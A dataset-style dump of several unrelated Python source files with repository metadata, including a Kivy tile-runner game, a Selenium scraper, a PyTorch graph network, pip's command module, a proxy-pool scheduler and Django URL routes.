last_value_of_y = last_coordinates[1] + 1
for x in range(len(self.tiles_coordinates), self.number_of_tiles):
random_value = random.randint(0, 2)
# 0 -> straight
# 1 -> right
# 2 -> left
start_index = -int(self.vertical_NB_LINES / 2) + 1
end_index = start_index + self.vertical_NB_LINES - 2
if last_value_of_x <= start_index:
random_value = 1
if last_value_of_x >= end_index:
random_value = 2
self.tiles_coordinates.append((last_value_of_x, last_value_of_y))
if random_value == 1:
last_value_of_x += 1
self.tiles_coordinates.append((last_value_of_x, last_value_of_y))
last_value_of_y += 1
self.tiles_coordinates.append((last_value_of_x, last_value_of_y))
if random_value == 2:
last_value_of_x -= 1
self.tiles_coordinates.append((last_value_of_x, last_value_of_y))
last_value_of_y += 1
self.tiles_coordinates.append((last_value_of_x, last_value_of_y))
last_value_of_y += 1
def init_vertical_lines(self):
with self.canvas:
Color(0, 1, 1)
# self.line = Line(points=[100, 0, 100, 100])
for x in range(0, self.vertical_NB_LINES):
self.vertical_lines.append(Line())
def get_lineX_from_index(self, index):
central_line_x = self.perspective_point_x
spacing = self.vertical_LINE_SPACING * self.width
offset = index - 0.5
line_x = central_line_x + (offset * spacing + self.current_offset_x)
return line_x
def get_lineY_from_index(self, index):
spacing_y = self.horizontal_LINE_SPACING * self.height
line_y = index * spacing_y - self.current_offset_y
return line_y
def get_tile_coordinates(self, tile_x, tile_y):
tile_y = tile_y - self.current_y_loop
x = self.get_lineX_from_index(tile_x)
y = self.get_lineY_from_index(tile_y)
return x, y
def update_tiles(self):
for x in range(0, self.number_of_tiles):
tile = self.tiles[x]
tile_coordinates = self.tiles_coordinates[x]
xmin, ymin = self.get_tile_coordinates(tile_coordinates[0], tile_coordinates[1])
xmax, ymax = self.get_tile_coordinates(tile_coordinates[0] + 1, tile_coordinates[1] + 1)
# 2 3
#
# 1 4
x1, y1 = self.transform(xmin, ymin)
x2, y2 = self.transform(xmin, ymax)
x3, y3 = self.transform(xmax, ymax)
x4, y4 = self.transform(xmax, ymin)
tile.points = [x1, y1, x2, y2, x3, y3, x4, y4]
def update_vertical_lines(self):
# -1 0 1 2
start_index = -int(self.vertical_NB_LINES / 2) + 1
for x in range(start_index, start_index + self.vertical_NB_LINES):
line_x = self.get_lineX_from_index(x)
x1, y1 = self.transform(line_x, 0)
x2, y2 = self.transform(line_x, self.height)
self.vertical_lines[x].points = [x1, y1, x2, y2]
def init_horizontal_lines(self):
with self.canvas:
Color(0, 1, 1)
for x in range(0, self.horizontal_NB_LINES):
self.horizontal_lines.append(Line())
def update_horizontal_lines(self):
start_index = -int(self.vertical_NB_LINES / 2) + 1
end_index = (start_index + self.vertical_NB_LINES) - 1
xmin = self.get_lineX_from_index(start_index)
xmax = self.get_lineX_from_index(end_index)
for x in range(0, self.horizontal_NB_LINES):
line_y = self.get_lineY_from_index(x)
x1, y1 = self.transform(xmin, line_y)
x2, y2 = self.transform(xmax, line_y)
self.horizontal_lines[x].points = [x1, y1, x2, y2]
def update(self, dt):
# print("update")
# print("dt: "+str(dt*60))
time_factor = dt * 60
self.update_vertical_lines()
self.update_horizontal_lines()
self.update_tiles()
self.update_ship()
if not self.game_over_state and self.game_started_state:
speed_y = (self.SPEED_Y * self.height) / 100
self.current_offset_y += (speed_y * time_factor)
spacing_y = self.horizontal_LINE_SPACING * self.height
while self.current_offset_y >= spacing_y:
self.current_offset_y -= spacing_y
self.current_y_loop += 1
self.score_text = "SCORE: " + str(self.current_y_loop)
self.generate_tiles_coordinate()
if self.game_mode == "Easy":
self.SPEED_Y = 0.05
if self.current_y_loop >= 5:
self.SPEED_Y = .1
if self.current_y_loop >= 20:
self.SPEED_Y = .15
if self.current_y_loop >= 60:
self.SPEED_Y = .2
if self.current_y_loop >= 100:
self.SPEED_Y = .25
if self.current_y_loop >= 130:
self.SPEED_Y = .3
if self.current_y_loop >= 160:
self.SPEED_Y = .35
if self.current_y_loop >= 200:
self.SPEED_Y = .4
if self.current_y_loop >= 240:
self.SPEED_Y = .45
if self.current_y_loop >= 280:
self.SPEED_Y = .5
if self.current_y_loop >= 320:
self.SPEED_Y = .55
if self.current_y_loop >= 360:
self.SPEED_Y = .6
if self.current_y_loop >= 400:
self.SPEED_Y = 2.6
if self.current_y_loop >= 450:
self.SPEED_Y = .65
if self.current_y_loop >= 500:
self.SPEED_Y = .7
if self.current_y_loop >= 600:
self.SPEED_Y = .725
if self.current_y_loop >= 800:
self.SPEED_Y = .75
if self.current_y_loop >= 1100:
self.SPEED_Y = .775
if self.current_y_loop >= 1300:
self.SPEED_Y = .85
if self.current_y_loop >= 1500:
self.SPEED_Y = 1.0
if self.current_y_loop >= 1700:
self.SPEED_Y = 1.025
if self.current_y_loop >= 2000:
self.SPEED_Y = 1.05
if self.current_y_loop >= 2200:
self.SPEED_Y = 1.1
if self.current_y_loop >= 2500:
self.SPEED_Y = 1.125
if self.current_y_loop >= 2800:
self.SPEED_Y = 1.15
if self.current_y_loop >= 3200:
self.SPEED_Y = 1.2
if self.current_y_loop >= 3500:
self.SPEED_Y = 1.25
if self.game_mode == "Medium":
self.SPEED_Y = .1
if self.current_y_loop >= 5:
self.SPEED_Y = .15
if self.current_y_loop >= 20:
self.SPEED_Y = .2
if self.current_y_loop >= 60:
self.SPEED_Y = .25
if self.current_y_loop >= 100:
self.SPEED_Y = .3
if self.current_y_loop >= 200:
self.SPEED_Y = .35
if self.current_y_loop >= 350:
self.SPEED_Y = .4
if self.current_y_loop >= 400:
self.SPEED_Y = .45
if self.current_y_loop >= 550:
self.SPEED_Y = .5
if self.current_y_loop >= 750:
self.SPEED_Y = .6
if self.current_y_loop >= 950:
self.SPEED_Y = .7
if self.current_y_loop >= 1050:
self.SPEED_Y = .8
if self.current_y_loop >= 1350:
self.SPEED_Y = .9
if self.current_y_loop >= 1500:
self.SPEED_Y = 1.0
if self.current_y_loop >= 1700:
self.SPEED_Y = 1.2
if self.game_mode == "Hard":
self.SPEED_Y = .2
if self.current_y_loop >= 5:
self.SPEED_Y = .3
if self.current_y_loop >= 15:
self.SPEED_Y = .4
if self.current_y_loop >= 30:
self.SPEED_Y = .5
if self.current_y_loop >= 90:
self.SPEED_Y = .65
if self.current_y_loop >= 150:
self.SPEED_Y = .8
if self.current_y_loop >= 300:
self.SPEED_Y = 1.05
if self.current_y_loop >= 450:
self.SPEED_Y = 1.2
if self.current_y_loop >= 650:
self.SPEED_Y = 1.35
if self.current_y_loop >= 750:
self.SPEED_Y = 1.45
if self.current_y_loop >= 850:
self.SPEED_Y = 1.6
if self.current_y_loop >= 950:
self.SPEED_Y = 1.7
if self.current_y_loop >= 1050:
self.SPEED_Y = 1.8
if self.current_y_loop >= 1200:
self.SPEED_Y = 1.95
if self.current_y_loop >= 1400:
self.SPEED_Y = 2.2
speed_x = (self.current_speed_x * self.width) / 100
self.current_offset_x += (speed_x * time_factor)
if not self.check_ship_collision() and not self.game_over_state:
self.game_over_state = True
self.home_title = "G A M E O V E R !"
self.home_button_title = "RESTART"
self.home_widget.opacity = 1
self.game_sound.stop()
self.game_sound2.stop()
self.game_over_sound.play()
if highscoreDatabase.newHighScore(self.current_y_loop):
new = highscoreDatabase.newHighScore(self.current_y_loop)
highscoreDatabase.addHighScore(self.current_y_loop)
self.new_highscore_title = f"New Highscore!: {new}"
else:
self.new_highscore_title = ""
Clock.schedule_once(self.continue_playing_game_sound, 220)
# def play_game_over_sound(self, dt):
# self.game_over_sound.play()
def continue_playing_game_sound(self, dt):
if not self.game_over_state:
self.game_sound2.play()
def game_started(self):
if self.game_over_state:
self.restart_sound.play()
self.game_sound.play()
else:
self.game_sound.play()
Clock.schedule_once(self.continue_playing_game_sound, 220)
self.reset_game()
self.game_started_state = True
self.home_widget.opacity = 0
def easy_mode(self, widget):
self.easy = True
if widget.state == "normal":
widget.text = "Easy"
self.start_game_enabled = False
self.medium_mode_enabled = True
self.hard_mode_enabled = True
else:
widget.text = "EASY"
self.game_mode = "Easy"
self.start_game_enabled = True
self.medium_mode_enabled = False
self.hard_mode_enabled = False
def medium_mode(self, widget):
self.medium = True
if widget.state == "normal":
widget.text = "Medium"
self.start_game_enabled = False
self.easy_mode_enabled = True
self.hard_mode_enabled = True
else:
widget.text = "MEDIUM"
self.game_mode = "Medium"
self.start_game_enabled = True
self.easy_mode_enabled = False
self.hard_mode_enabled = False
def hard_mode(self, widget):
self.hard = True
if widget.state == "normal":
widget.text = "Hard"
self.start_game_enabled = False
self.easy_mode_enabled = True
self.medium_mode_enabled = True
else:
widget.text = "HARD"
self.game_mode = "Hard"
self.start_game_enabled = True
self.easy_mode_enabled = False
self.medium_mode_enabled = False
def high_score_mode(self, widget):
new = highscoreDatabase.viewHighScores()
self.high_scores_enabled = True
if widget.state == "normal":
widget.text = "View"
self.high_scores = f"HIGH SCORES: "
else:
widget.text = "Close"
self.high_scores = f"HIGH SCORES: {new}"
class Spaceship_Troopers(MDApp):
def build(self):
self.title = "Spaceship Troopers"
pass
if __name__ == "__main__":
Spaceship_Troopers().run()
|
[
"DavidJoanes@users.noreply.github.com"
] |
DavidJoanes@users.noreply.github.com
|
aad1f4c9e8e6f67d4f567d20487589670cb03012
|
f9b76428cd81aeda45b879a3f496139199b92839
|
/productosObj.py
|
9aca9ede17e6905845c325309032aa75eb3eaf7c
|
[] |
no_license
|
melanieepena/PruebaHeroku
|
3b104a1669935ad8bbb36cbe0574ad23d6ddf39f
|
8919eaadb05d486e3e7374b2ab9389d3621c79cb
|
refs/heads/master
| 2022-12-10T16:28:02.338168
| 2020-08-24T00:20:44
| 2020-08-24T00:20:44
| 288,928,821
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 729
|
py
|
class productosObj:
def __init__(self, id, name, picture, desc, costo, precio, patente, id_emp):
self.id = id
self.name = name
self.picture = picture
self.desc = desc
self.costo = costo
self.precio = precio
self.patente = patente
self.id_emp = id_emp
def getId(self):
return self.id
def getName(self):
return self.name
def getPicture(self):
return self.picture
def getDesc(self):
return self.desc
def getCosto(self):
return self.costo
def getPrecio(self):
return self.precio
def getPatente(self):
return self.patente
def getIdEmp(self):
return self.id_emp
|
[
"meelpg8@gmail.com"
] |
meelpg8@gmail.com
|
acd3097659c130224500a4c3e8df92e6398f16c0
|
3fb6a7931344bf8bb32fd844c91246f386f16763
|
/webscrape.py
|
0cdb15a8ca29552192cf8d61e46965d399ddb8e5
|
[] |
no_license
|
Brat-Pit/allegro
|
96f69d591776d11de791f63d700c7cc113086e08
|
1f87b242c775be4d55a6ebb0bad8120f99af7163
|
refs/heads/master
| 2021-01-05T14:48:31.697752
| 2020-02-26T08:54:36
| 2020-02-26T08:54:36
| 241,054,400
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,665
|
py
|
# -*- coding: utf-8 -*-
from selenium import webdriver
import random
import time
state="nowe" #new products only
offer_type="kup teraz" #buy now format only
max_number_subpages=3
def pause():
paus = random.randint(9500,11073)
time.sleep(paus/1000)
# create a new Firefox session
driver = webdriver.Firefox()
driver.implicitly_wait(10)
#url containing soy&candle products
url="https://allegro.pl/kategoria/swiece-i-swieczniki-swiece-254295?stan=nowe&offerTypeBuyNow=1&string=sojowa&order=qd"
driver.get(url)
#service's internal add: required manual decision
pause()
for subpage_no in range(1,max_number_subpages):
item_list = driver.find_elements_by_xpath("//div[@class='_00d6b80']")
for item in item_list:
header=item.find_element_by_class_name("ebc9be2").text
item_offers_no=item.find_element_by_xpath('.//span[@class = "_41ddd69"]').get_attribute('innerHTML')
price=item.find_element_by_xpath('.//span[@class = "fee8042"]').text
link = item.find_element_by_css_selector('h2.ebc9be2>a').get_attribute('href')
print(header + ' | ' + item_offers_no + ' | ' + price + ' | ' + link)
#hit 'Next' subpage if possible
current_subpage_no=driver.find_element_by_xpath("//input[@class='_14uqc _1r8rh _u5o1q _1t9p2 _cc6ig _3db39_3ISNX']").get_attribute('value')
subpages_total_no=driver.find_element_by_xpath("//span[@class='_1h7wt _1fkm6 _g1gnj _3db39_3i0GV _3db39_XEsAE']").text
if current_subpage_no==subpages_total_no:
break
else:
driver.find_element_by_xpath("//span[@class='_lsy4e _1y3c2 _3db39_mcaVQ _ls4gg']").click()
pause()
|
[
"noreply@github.com"
] |
Brat-Pit.noreply@github.com
|
f76bfd3907c9b45e0c1e3ac4c3b1d3e439abc05a
|
7b6fce880a3c4ca45c6889273bff7e4f59efebbb
|
/kaolin/models/GraphResNet.py
|
e85eb73b7882e71920b33efcb51a81dd15c084ad
|
[
"Apache-2.0"
] |
permissive
|
Jean-Francois-Lafleche/kaolin
|
f4c7d023d74af54b04852b6026e55ddd5d7ea198
|
a8055112566d43ca5d3b4d44041ea2303b314a1a
|
refs/heads/master
| 2023-01-11T01:23:40.934370
| 2019-12-02T22:05:08
| 2019-12-02T22:05:08
| 222,455,742
| 2
| 1
|
NOASSERTION
| 2020-01-10T21:47:15
| 2019-11-18T13:28:36
|
C++
|
UTF-8
|
Python
| false
| false
| 2,926
|
py
|
# Copyright (c) 2019, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import math
import torch
from torch import nn
from torch.nn.parameter import Parameter
import torch.nn.functional as F
import torch
from torch.nn import Parameter
from .SimpleGCN import SimpleGCN
class GraphResNet(nn.Module):
r"""An enhanced version of the MeshEncoder; used residual connections
across graph convolution layers.
"""
def __init__(self, input_features, hidden = 192, output_features = 3):
super(G_Res_Net, self).__init__()
self.gc1 = SimpleGCN(input_features, hidden)
self.gc2 = SimpleGCN(hidden, hidden)
self.gc3 = SimpleGCN(hidden , hidden)
self.gc4 = SimpleGCN(hidden, hidden)
self.gc5 = SimpleGCN(hidden , hidden)
self.gc6 = SimpleGCN(hidden, hidden)
self.gc7 = SimpleGCN(hidden , hidden)
self.gc8 = SimpleGCN(hidden, hidden)
self.gc9 = SimpleGCN(hidden , hidden)
self.gc10 = SimpleGCN(hidden, hidden)
self.gc11 = SimpleGCN(hidden , hidden)
self.gc12 = SimpleGCN(hidden, hidden)
self.gc13 = SimpleGCN(hidden , hidden)
self.gc14 = SimpleGCN(hidden, output_features)
self.hidden = hidden
def forward(self, features, adj):
x = (F.relu(self.gc1(features, adj)))
x = (F.relu(self.gc2(x, adj)))
features = features[..., :self.hidden] + x
features /= 2.
# 2
x = (F.relu(self.gc3(features, adj)))
x = (F.relu(self.gc4(x, adj)))
features = features + x
features /= 2.
# 3
x = (F.relu(self.gc5(features, adj)))
x = (F.relu(self.gc6(x, adj)))
features = features + x
features /= 2.
# 4
x = (F.relu(self.gc7(features, adj)))
x = (F.relu(self.gc8(x, adj)))
features = features + x
features /= 2.
# 5
x = (F.relu(self.gc9(features, adj)))
x = (F.relu(self.gc10(x, adj)))
features = features + x
features /= 2.
# 6
x = (F.relu(self.gc11(features, adj)))
x = (F.relu(self.gc12(x, adj)))
features = features + x
features /= 2.
# 7
x = (F.relu(self.gc13(features, adj)))
features = features + x
features /= 2.
coords = (self.gc14(features, adj))
return coords,features
|
[
"krrish94@gmail.com"
] |
krrish94@gmail.com
|
f13d147263b867639723411587d960b2c9b032ac
|
242c84cdee8a0f5c5b0e9eb5cdab5078e2feb357
|
/code.py
|
d009687a6e8fdc82e48ea8d2cbb5c757295e9a8b
|
[] |
no_license
|
MohanSharmav/zekelabslabs-assignment
|
bffb22286701d597afb67433c68852310f006a14
|
e1a2fd21831f24f698a4e2c24a32cde4f921aca9
|
refs/heads/master
| 2020-12-04T22:34:10.847187
| 2020-01-05T13:50:40
| 2020-01-05T13:50:40
| 231,923,944
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,787
|
py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sun Jan 5 07:00:43 2020
@author: mohan
class retired:
# defining the class
names=input(sting())
couple=input(boolean())
def allocatefund(self,fund):
#defining funtion alocate funds
self.fund=fund
def fund(self):
return self.fund
def __str9__(self):
return "%s is a %s" % (self.fund)
def jointhemself(self,name,couple)
#defining function jointemself
self.name=namevv
self.couple=couple
def name(self):
return self.name
def couple(self):
return self.couple
def __str8__(self):
return "%s is a %s" % (self.name, self.couple)
def approve(self,accept):
#define approve function
self.accept=accept
def accept(self):
return self.accept
def __str7__(self):
return "%s is a %s" % (self.accept)
class young:
name=string(input())
gender=string(input())
#define young class
def earn(self,money):
self.money=moeny
def money(self):
return self.moeny
def __str6__(self):
return "%s is a %s" % (self.moeney)
def care(self,care)
self.care=care
def care(self):
return self.care
def __str5__(self):
return "%s is a %s" % (self.care)
def request(self,request)
self.request=request
def request(self):
return self.request
def __str4__(self):
return "%s is a %s" % (self.request)
def request(self,choosing)
self.choosing=choosing
def request(self):
return self.choosing
def __str3__(self):
return "%s is a %s" % (self.choosing)
def request(self,max):
self.max=max
def request(self):
return self.max
def __str2__(self):
return "%s is a %s" % (self.max)
class review ():
rate=int(input())
review=string(input())
def rate(self,rate):
self.rate=rate
def rate(self):
return self.rate
def __str1_(self):
returq"n "%s is a %s" % (self.rate)
def review(self,review):
self.review=review
def review(self):
return self.review
def __str10__(self):
return "%s is a %s" % (self.review)
class info:
combi=input(string())
def combi(self,combi):
self.combi=combi
def request(self):
return self.combi
def __str14__(self):
return "%s is a %s" % (self.max)
|
[
"noreply@github.com"
] |
MohanSharmav.noreply@github.com
|
93a2fb3e1ff02e04dc8e1206b435a3c6a66fb056
|
03f40e1e96f78240904ee90ae3257611e0d2b981
|
/venv/lib/python3.8/site-packages/pip-19.0.3-py3.8.egg/pip/_internal/cli/base_command.py
|
1b91389b9892aac2e52a005332052a4381b00593
|
[] |
no_license
|
otr0624/StoreApp
|
bd584a37af668a4055969cdf03fa2e688f51e395
|
76ae4040ccfe1f415c8c2acf88550690cb537290
|
refs/heads/master
| 2022-04-22T19:35:03.231742
| 2020-04-14T23:43:19
| 2020-04-14T23:43:19
| 255,651,497
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 12,501
|
py
|
"""Base Command class, and related routines"""
from __future__ import absolute_import, print_function
import logging
import logging.config
import optparse
import os
import platform
import sys
import traceback
from pip._internal.cli import cmdoptions
from pip._internal.cli.parser import (
ConfigOptionParser,
UpdatingDefaultsHelpFormatter,
)
from pip._internal.cli.status_codes import (
ERROR,
PREVIOUS_BUILD_DIR_ERROR,
SUCCESS,
UNKNOWN_ERROR,
VIRTUALENV_NOT_FOUND,
)
from pip._internal.download import PipSession
from pip._internal.exceptions import (
BadCommand,
CommandError,
InstallationError,
PreviousBuildDirError,
UninstallationError,
)
from pip._internal.index import PackageFinder
from pip._internal.locations import running_under_virtualenv
from pip._internal.req.constructors import (
install_req_from_editable,
install_req_from_line,
)
from pip._internal.req.req_file import parse_requirements
from pip._internal.utils.deprecation import deprecated
from pip._internal.utils.logging import BrokenStdoutLoggingError, setup_logging
from pip._internal.utils.misc import (
get_prog,
normalize_path,
redact_password_from_url,
)
from pip._internal.utils.outdated import pip_version_check
from pip._internal.utils.typing import MYPY_CHECK_RUNNING
if MYPY_CHECK_RUNNING:
from typing import Optional, List, Tuple, Any # noqa: F401
from optparse import Values # noqa: F401
from pip._internal.cache import WheelCache # noqa: F401
from pip._internal.req.req_set import RequirementSet # noqa: F401
__all__ = ["Command"]
logger = logging.getLogger(__name__)
class Command(object):
name = None # type: Optional[str]
usage = None # type: Optional[str]
hidden = False # type: bool
ignore_require_venv = False # type: bool
def __init__(self, isolated=False):
# type: (bool) -> None
parser_kw = {
"usage": self.usage,
"prog": "%s %s" % (get_prog(), self.name),
"formatter": UpdatingDefaultsHelpFormatter(),
"add_help_option": False,
"name": self.name,
"description": self.__doc__,
"isolated": isolated,
}
self.parser = ConfigOptionParser(**parser_kw)
# Commands should add options to this option group
optgroup_name = "%s Options" % self.name.capitalize()
self.cmd_opts = optparse.OptionGroup(self.parser, optgroup_name)
# Add the general options
gen_opts = cmdoptions.make_option_group(cmdoptions.general_group, self.parser,)
self.parser.add_option_group(gen_opts)
def run(self, options, args):
# type: (Values, List[Any]) -> Any
raise NotImplementedError
def _build_session(self, options, retries=None, timeout=None):
# type: (Values, Optional[int], Optional[int]) -> PipSession
session = PipSession(
cache=(
normalize_path(os.path.join(options.cache_dir, "http"))
if options.cache_dir
else None
),
retries=retries if retries is not None else options.retries,
insecure_hosts=options.trusted_hosts,
)
# Handle custom ca-bundles from the user
if options.cert:
session.verify = options.cert
# Handle SSL client certificate
if options.client_cert:
session.cert = options.client_cert
# Handle timeouts
if options.timeout or timeout:
session.timeout = timeout if timeout is not None else options.timeout
# Handle configured proxies
if options.proxy:
session.proxies = {
"http": options.proxy,
"https": options.proxy,
}
# Determine if we can prompt the user for authentication or not
session.auth.prompting = not options.no_input
return session
def parse_args(self, args):
# type: (List[str]) -> Tuple
# factored out for testability
return self.parser.parse_args(args)
def main(self, args):
# type: (List[str]) -> int
options, args = self.parse_args(args)
# Set verbosity so that it can be used elsewhere.
self.verbosity = options.verbose - options.quiet
level_number = setup_logging(
verbosity=self.verbosity,
no_color=options.no_color,
user_log_file=options.log,
)
if sys.version_info[:2] == (3, 4):
deprecated(
"Python 3.4 support has been deprecated. pip 19.1 will be the "
"last one supporting it. Please upgrade your Python as Python "
"3.4 won't be maintained after March 2019 (cf PEP 429).",
replacement=None,
gone_in="19.2",
)
elif sys.version_info[:2] == (2, 7):
message = "A future version of pip will drop support for Python 2.7."
if platform.python_implementation() == "CPython":
message = (
"Python 2.7 will reach the end of its life on January "
"1st, 2020. Please upgrade your Python as Python 2.7 "
"won't be maintained after that date. "
) + message
deprecated(message, replacement=None, gone_in=None)
# TODO: Try to get these passing down from the command?
# without resorting to os.environ to hold these.
# This also affects isolated builds and it should.
if options.no_input:
os.environ["PIP_NO_INPUT"] = "1"
if options.exists_action:
os.environ["PIP_EXISTS_ACTION"] = " ".join(options.exists_action)
if options.require_venv and not self.ignore_require_venv:
# If a venv is required check if it can really be found
if not running_under_virtualenv():
logger.critical("Could not find an activated virtualenv (required).")
sys.exit(VIRTUALENV_NOT_FOUND)
try:
status = self.run(options, args)
# FIXME: all commands should return an exit status
# and when it is done, isinstance is not needed anymore
if isinstance(status, int):
return status
except PreviousBuildDirError as exc:
logger.critical(str(exc))
logger.debug("Exception information:", exc_info=True)
return PREVIOUS_BUILD_DIR_ERROR
except (InstallationError, UninstallationError, BadCommand) as exc:
logger.critical(str(exc))
logger.debug("Exception information:", exc_info=True)
return ERROR
except CommandError as exc:
logger.critical("ERROR: %s", exc)
logger.debug("Exception information:", exc_info=True)
return ERROR
except BrokenStdoutLoggingError:
# Bypass our logger and write any remaining messages to stderr
# because stdout no longer works.
print("ERROR: Pipe to stdout was broken", file=sys.stderr)
if level_number <= logging.DEBUG:
traceback.print_exc(file=sys.stderr)
return ERROR
except KeyboardInterrupt:
logger.critical("Operation cancelled by user")
logger.debug("Exception information:", exc_info=True)
return ERROR
except BaseException:
logger.critical("Exception:", exc_info=True)
return UNKNOWN_ERROR
finally:
allow_version_check = (
# Does this command have the index_group options?
hasattr(options, "no_index")
and
# Is this command allowed to perform this check?
not (options.disable_pip_version_check or options.no_index)
)
# Check if we're using the latest version of pip available
if allow_version_check:
session = self._build_session(
options, retries=0, timeout=min(5, options.timeout)
)
with session:
pip_version_check(session, options)
# Shutdown the logging module
logging.shutdown()
return SUCCESS
class RequirementCommand(Command):
@staticmethod
def populate_requirement_set(
requirement_set, # type: RequirementSet
args, # type: List[str]
options, # type: Values
finder, # type: PackageFinder
session, # type: PipSession
name, # type: str
wheel_cache, # type: Optional[WheelCache]
):
# type: (...) -> None
"""
Marshal cmd line args into a requirement set.
"""
# NOTE: As a side-effect, options.require_hashes and
# requirement_set.require_hashes may be updated
for filename in options.constraints:
for req_to_add in parse_requirements(
filename,
constraint=True,
finder=finder,
options=options,
session=session,
wheel_cache=wheel_cache,
):
req_to_add.is_direct = True
requirement_set.add_requirement(req_to_add)
for req in args:
req_to_add = install_req_from_line(
req,
None,
isolated=options.isolated_mode,
use_pep517=options.use_pep517,
wheel_cache=wheel_cache,
)
req_to_add.is_direct = True
requirement_set.add_requirement(req_to_add)
for req in options.editables:
req_to_add = install_req_from_editable(
req,
isolated=options.isolated_mode,
use_pep517=options.use_pep517,
wheel_cache=wheel_cache,
)
req_to_add.is_direct = True
requirement_set.add_requirement(req_to_add)
for filename in options.requirements:
for req_to_add in parse_requirements(
filename,
finder=finder,
options=options,
session=session,
wheel_cache=wheel_cache,
use_pep517=options.use_pep517,
):
req_to_add.is_direct = True
requirement_set.add_requirement(req_to_add)
# If --require-hashes was a line in a requirements file, tell
# RequirementSet about it:
requirement_set.require_hashes = options.require_hashes
if not (args or options.editables or options.requirements):
opts = {"name": name}
if options.find_links:
raise CommandError(
"You must give at least one requirement to %(name)s "
'(maybe you meant "pip %(name)s %(links)s"?)'
% dict(opts, links=" ".join(options.find_links))
)
else:
raise CommandError(
"You must give at least one requirement to %(name)s "
'(see "pip help %(name)s")' % opts
)
def _build_package_finder(
self,
options, # type: Values
session, # type: PipSession
platform=None, # type: Optional[str]
python_versions=None, # type: Optional[List[str]]
abi=None, # type: Optional[str]
implementation=None, # type: Optional[str]
):
# type: (...) -> PackageFinder
"""
Create a package finder appropriate to this requirement command.
"""
index_urls = [options.index_url] + options.extra_index_urls
if options.no_index:
logger.debug(
"Ignoring indexes: %s",
",".join(redact_password_from_url(url) for url in index_urls),
)
index_urls = []
return PackageFinder(
find_links=options.find_links,
format_control=options.format_control,
index_urls=index_urls,
trusted_hosts=options.trusted_hosts,
allow_all_prereleases=options.pre,
session=session,
platform=platform,
versions=python_versions,
abi=abi,
implementation=implementation,
prefer_binary=options.prefer_binary,
)
|
[
"otr0624@mail.com"
] |
otr0624@mail.com
|
a6c842eed1101af2549ccae3147b4114cab2c774
|
be00087163598b7876c88327f6b01a8082aaa29d
|
/proxypool/scheduler.py
|
c59e6aef975602799faf7770f47031a478f59de5
|
[
"Apache-2.0"
] |
permissive
|
saury2013/ProxyPoolManager
|
67b61a24c22a00b3606f080f4f3e385074e54b0c
|
8ad9b6b35b03e02bc748e11db262c9ea94a65fbe
|
refs/heads/master
| 2022-12-16T06:59:14.875425
| 2018-04-27T15:53:03
| 2018-04-27T15:53:03
| 131,309,102
| 1
| 0
|
Apache-2.0
| 2022-12-08T02:11:04
| 2018-04-27T14:45:47
|
Python
|
UTF-8
|
Python
| false
| false
| 1,229
|
py
|
# -*- coding: utf-8 -*-
__author__ = 'Allen'
import time
from multiprocessing import Process
from proxypool.server import app
from proxypool.importer import Importer
from proxypool.tester import Tester
from proxypool.conf import *
class Scheduler():
def schedule_tester(self,cycle=TESTER_CYCLE):
tester = Tester()
while True:
print('run test...')
tester.run()
time.sleep(cycle)
def schedule_importer(self,cycle=GETTER_CYCLE):
importer = Importer()
while True:
print('importer run...')
importer.import_from_net()
time.sleep(cycle)
def schedule_server(self):
print('server run in ',SERVER_HOST,':',SERVER_PORT)
app.run(SERVER_HOST,SERVER_PORT)
def run(self):
print('ProxyManager running...')
if TESTER_ENABLED:
tester_process = Process(target=self.schedule_tester)
tester_process.start()
if IMPORTER_ENABLED:
importer_process = Process(target=self.schedule_importer)
importer_process.start()
if SERVER_ENABLED:
server_process = Process(target=self.schedule_server)
server_process.start()
|
[
"saury2011@sina.com"
] |
saury2011@sina.com
|
ffc341374c3963e03ae196c04ffb63f090bf256d
|
fb05e7987622c8e9e49abaaef8b7681d07fe2013
|
/PCCFP/urls.py
|
78092f4f250c2f72135e1040ccb49c23f4d2137a
|
[] |
no_license
|
Wayne122/PCCFP
|
d012aaa62bb515fcc28d11f557a9ee1c2f2103f7
|
7babde9bd971b4d60b8bbc9096cbd65473715be2
|
refs/heads/master
| 2021-09-02T11:15:02.804602
| 2018-01-02T07:44:30
| 2018-01-02T07:44:30
| 115,988,388
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,777
|
py
|
"""PCCFP URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.conf.urls import url, include
from django.contrib.auth import views as auth_views
from article.views import home, account, article, create, author_works, follow, unfollow, follow_list, comment, edit
urlpatterns = [
url(r'^admin/', admin.site.urls),
url(r'^$', home, name='home'),
url(r'^login/$', auth_views.login, name='login'),
url(r'^logout/$', auth_views.logout, {'next_page': 'home'}, name='logout'),
url(r'^oauth/', include('social_django.urls', namespace='social')),
url(r'^account_detail/', account, name='account_detail'),
url(r'^article/(?P<pk>\d+)/$', article, name='article_detail'),
url(r'^create/$', create, name='create_article'),
url(r'^author/(?P<pk>\d+)/$', author_works, name='author'),
url(r'^follow/(?P<pk>\d+)/$', follow, name='follow'),
url(r'^unfollow/(?P<pk>\d+)/$', unfollow, name='unfollow'),
url(r'^follow_list/$', follow_list, name='follow_list'),
url(r'^article/(?P<pk>\d+)/comment/$', comment, name='comment'),
url(r'^article/(?P<pk>\d+)/edit/$', edit, name='edit_article'),
]
|
[
"noreply@github.com"
] |
Wayne122.noreply@github.com
|
677ab1c8a55d31eb4cb350562b92d815d5ce7264
|
b155e9d8951f7b3437b21994dfa81eac740ab940
